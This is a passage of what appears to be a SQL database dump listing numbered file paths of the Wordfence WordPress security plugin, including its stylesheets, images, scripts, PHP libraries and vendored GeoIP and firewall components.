ence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(697,'wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css'),(698,'wp-content/plugins/wordfence/css/diff.1623076348.css'),(699,'wp-content/plugins/wordfence/css/dt_table.1623076348.css'),(700,'wp-content/plugins/wordfence/css/fullLog.1623076348.css'),(701,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(702,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(703,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(704,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(705,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(706,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(707,'wp-content/plugins/wordfence/css/iptraf.1623076348.css'),(708,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css'),(709,'wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css'),(710,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css'),(711,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css'),(712,'wp-content/plugins/wordfence/css/main.1623076348.css'),(713,'wp-content/plugins/wordfence/css/phpinfo.1623076348.css'),(714,'wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css'),(715,'wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css'),(716,'wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css'),(717,'wp-content/plugins/wordfence/css/wf-global.1623076348.css'),(718,'wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css'),(719,'wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css'),(720,'wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css'),(721,'wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css'),(722,'wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css'),(723,'wp-content/plugins/wordfence/images/2fa-whole.svg'),(724,'wp-content/plugins/wordfence/images/2fa1.svg'),(725,'wp-content/plugins/wordfence/images/2fa2.svg'),(726,'wp-content/plugins/wordfence/images/back_disabled.jpg'),(727,'wp-content/plugins/wordfence/images/back_enabled.jpg'),(728,'wp-content/plugins/wordfence/images/blocking.svg'),(729,'wp-content/plugins/wordfence/images/button-grad-grey.png'),(730,'wp-content/plugins/wordfence/images/checkbox.png'),(731,'wp-content/plugins/wordfence/images/flags.png'),(732,'wp-content/plugins/wordfence/images/forward_disabled.jpg'),(733,'wp-content/plugins/wordfence/images/forward_enabled.jpg'),(734,'wp-content/plugins/wordfence/images/help.png'),(735,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(736,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(737,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(738,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(739,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(740,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(741,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(742,'wp-content/plugins/wordfence/images/icons/email_go.png'),(743,'wp-content/plugins/wordfence/images/icons/error128.png'),(744,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(745,'wp-content/plugins/wordfence/images/icons/tick128.png'),(746,'wp-content/plugins/wordfence/images/icons/warning128.png'),(747,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(748,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(749,'wp-content/plugins/wordfence/images/loading.gif'),(750,'wp-content/plugins/wordfence/images/loading_background.png'),(751,'wp-content/plugins/wordfence/images/loading_large.gif'),(752,'wp-content/plugins/wordfence/images/logo.png'),(753,'wp-content/plugins/wordfence/images/options.svg'),(754,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(755,'wp-content/plugins/wordfence/images/sort_asc.gif'),(756,'wp-content/plugins/wordfence/images/sort_asc.png'),(757,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(758,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(759,'wp-content/plugins/wordfence/images/sort_both.gif'),(760,'wp-content/plugins/wordfence/images/sort_both.png'),(761,'wp-content/plugins/wordfence/images/sort_desc.gif'),(762,'wp-content/plugins/wordfence/images/sort_desc.png'),(763,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(764,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(765,'wp-content/plugins/wordfence/images/support.svg'),(766,'wp-content/plugins/wordfence/images/tools.svg'),(767,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(768,'wp-content/plugins/wordfence/images/wf-error-badge.svg'),(769,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(770,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(771,'wp-content/plugins/wordfence/index.php'),(772,'wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js'),(773,'wp-content/plugins/wordfence/js/admin.1623076348.js'),(774,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js'),(775,'wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js'),(776,'wp-content/plugins/wordfence/js/date.1623076348.js'),(777,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js'),(778,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js'),(779,'wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js'),(780,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js'),(781,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js'),(782,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js'),(783,'wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js'),(784,'wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js'),(785,'wp-content/plugins/wordfence/js/wfdashboard.1623076348.js'),(786,'wp-content/plugins/wordfence/js/wfdropdown.1623076348.js'),(787,'wp-content/plugins/wordfence/js/wfglobal.1623076348.js'),(788,'wp-content/plugins/wordfence/js/wfi18n.1623076348.js'),(789,'wp-content/plugins/wordfence/js/wfpopover.1623076348.js'),(790,'wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js'),(791,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(792,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(793,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(794,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(795,'wp-content/plugins/wordfence/lib/Diff.php'),(796,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(797,'wp-content/plugins/wordfence/lib/IPTraf.php'),(798,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(799,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(800,'wp-content/plugins/wordfence/lib/compat.php'),(801,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(802,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(803,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(804,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(805,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(806,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(807,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(808,'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),(809,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(810,'wp-content/plugins/wordfence/lib/diffResult.php'),(811,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(812,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(813,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(814,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(815,'wp-content/plugins/wordfence/lib/flags.php'),(816,'wp-content/plugins/wordfence/lib/live_activity.php'),(817,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(818,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(819,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(820,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(821,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(822,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(823,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(824,'wp-content/plugins/wordfence/lib/menu_options.php'),(825,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(826,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(827,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(828,'wp-content/plugins/wordfence/lib/menu_support.php'),(829,'wp-content/plugins/wordfence/lib/menu_tools.php'),(830,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(831,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(832,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(833,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(834,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(835,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(836,'wp-content/plugins/wordfence/lib/noc1.key'),(837,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(838,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(839,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(840,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(841,'wp-content/plugins/wordfence/lib/sysinfo.php'),(842,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(843,'wp-content/plugins/wordfence/lib/wf503.php'),(844,'wp-content/plugins/wordfence/lib/wfAPI.php'),(845,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(846,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(847,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(848,'wp-content/plugins/wordfence/lib/wfArray.php'),(849,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(850,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(851,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(852,'wp-content/plugins/wordfence/lib/wfCache.php'),(853,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(854,'wp-content/plugins/wordfence/lib/wfConfig.php'),(855,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(856,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(857,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(858,'wp-content/plugins/wordfence/lib/wfDB.php'),(859,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(860,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(861,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(862,'wp-content/plugins/wordfence/lib/wfDict.php'),(863,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(864,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(865,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(866,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(867,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(868,'wp-content/plugins/wordfence/lib/wfIssues.php'),(869,'wp-content/plugins/wordfence/lib/wfJWT.php'),(870,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(871,'wp-content/plugins/wordfence/lib/wfLog.php'),(872,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(873,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(874,'wp-content/plugins/wordfence/lib/wfNotification.php'),(875,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(876,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(877,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(878,'wp-content/plugins/wordfence/lib/wfScan.php'),(879,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(880,'wp-content/plugins/wordfence/lib/wfSchema.php'),(881,'wp-content/plugins/wordfence/lib/wfStyle.php'),(882,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(883,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(884,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(885,'wp-content/plugins/wordfence/lib/wfUtils.php'),(886,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(887,'wp-content/plugins/wordfence/lib/wfView.php'),(888,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(889,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(890,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(891,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(892,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(893,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(894,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(895,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(896,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(897,'wp-content/plugins/wordfence/models/common/wfTab.php'),(898,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(899,'wp-content/plugins/wordfence/models/page/wfPage.php'),(900,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(901,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(902,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(903,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(904,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(905,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(906,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(907,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(908,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(909,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(910,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(911,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(912,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(913,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(914,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(915,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(916,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(917,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(918,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(919,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(920,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(921,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(922,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(923,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(924,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(925,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(926,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(927,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(928,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(929,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(930,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(931,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(932,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css'),(933,'wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css'),(934,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css'),(935,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css'),(936,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css'),(937,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css'),(938,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css'),(939,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css'),(940,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css'),(941,'wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css'),(942,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(943,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(944,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(945,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(946,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(947,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(948,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(949,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(950,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(951,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(952,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(953,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js'),(954,'wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js'),(955,'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js'),(956,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js'),(957,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js'),(958,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js'),(959,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js'),(960,'wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js'),(961,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(962,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(963,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(964,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(965,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(966,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(967,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(968,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(969,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(970,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(971,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(972,'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),(973,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(974,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(975,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(976,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(977,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(978,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(979,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(980,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(981,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(982,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(983,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(984,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(985,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(986,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(987,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(988,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(989,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(990,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(991,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(992,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(993,'wp-content/plugins/wordfence/readme.txt'),(994,'wp-content/plugins/wordfence/vendor/autoload.php'),(995,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(996,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(997,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(998,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(999,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(1000,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(1001,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(1002,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(1003,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(1004,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(1005,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(1006,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(1007,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(1008,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(1009,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(1010,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(1011,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(1012,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(1013,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(1014,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(1015,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(1016,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(1017,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(1018,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(1019,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(1020,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(1021,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(1022,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(1023,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(1024,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(1025,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(1026,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(1027,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(1028,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(1029,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(1030,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(1031,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(1032,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(1033,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(1034,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(1035,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(1036,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(1037,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(1038,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),(1039,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),(1040,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),(1041,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),(1042,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),(1043,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),(1044,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),(1045,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),(1046,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),(1047,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),(1048,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),(1049,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),(1050,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),(1051,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),(1052,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),(1053,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),(1054,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),(1055,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),(1056,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),(1057,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),(1058,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),(1059,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(1060,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(1061,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(1062,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(1063,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(1064,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),(1065,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(1066,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(1067,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(1068,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(1069,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(1070,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(1071,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(1072,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(1073,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(1074,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(1075,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(1076,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(1077,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(1078,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(1079,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(1080,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(1081,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(1082,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(1083,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(1084,'wp-content/plugins/wordfence/views/blocking/block-list.php'),(1085,'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(1086,'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(1087,'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(1088,'wp-content/plugins/wordfence/views/blocking/country-modal.php'),(1089,'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(1090,'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(1091,'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(1092,'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(1093,'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(1094,'wp-content/plugins/wordfence/views/common/license.php'),(1095,'wp-content/plugins/wordfence/views/common/modal-prompt.php'),(1096,'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(1097,'wp-content/plugins/wordfence/views/common/page-help.php'),(1098,'wp-